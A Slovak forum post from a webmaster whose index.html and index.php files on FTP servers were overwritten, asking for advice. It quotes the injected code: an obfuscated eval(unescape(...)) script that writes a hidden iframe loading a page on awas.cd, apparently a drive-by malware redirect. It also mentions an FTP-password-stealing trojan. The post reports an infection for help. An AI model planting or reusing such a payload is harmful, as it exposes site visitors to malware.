zmenené index súbory na ftp serveri

Zdravím Vás!

Objavil sa mi problém, na ktory som nasiel zatial len ciastocnu odpoved. Niekto, alebo nieco mi zacal na ftp serveroch prepisovat subory index.html a index.php. zachytil som tento kus kodu na konci stranky:

...

</html>

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%4  4%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69 %66%72%61%6d%65%20%6e%61%6d%65%3d%38%35%62%20%73%72%63%3d%5c%27%68%74% 74%70%3a%2f%2f%61%77%61%73%2e%63%64%2f%74%64%73%2f%69%6e%64%65%78%2e%7 0%68%70%3f%6f%75%74%3d%31%31%39%33%37%37%32%31%35%30&%27%2b%4d%61%74%6  8%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34 %30%35%33%34%29%2b%27%37%63%66%38%64%37%36%36%39%37%61%61%5c%27%20%77% 69%64%74%68%3d%34%38%33%20%68%65%69%67%68%74%3d%34%39%38%20%73%74%79%6 c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69 %66%72%61%6d%65%3e%27%29")); </script>

pri nacitani prehliadac caka na nacitanie obsahu z nejakej awas.cd.

Pocul som, ze nejaky trojan z total commanderu ziska hesla ftp serverov, a odosiela nejakym
robotom, ktory nasledne posobia nasledujuce veci. Zatial sa mi to stalo u dvoch nezavislich webov, ktori maju totozneho poskytovatela (+ cca 4 kolegove klienti u totozneho poskytovatela).

Dakujem za postrehy, napady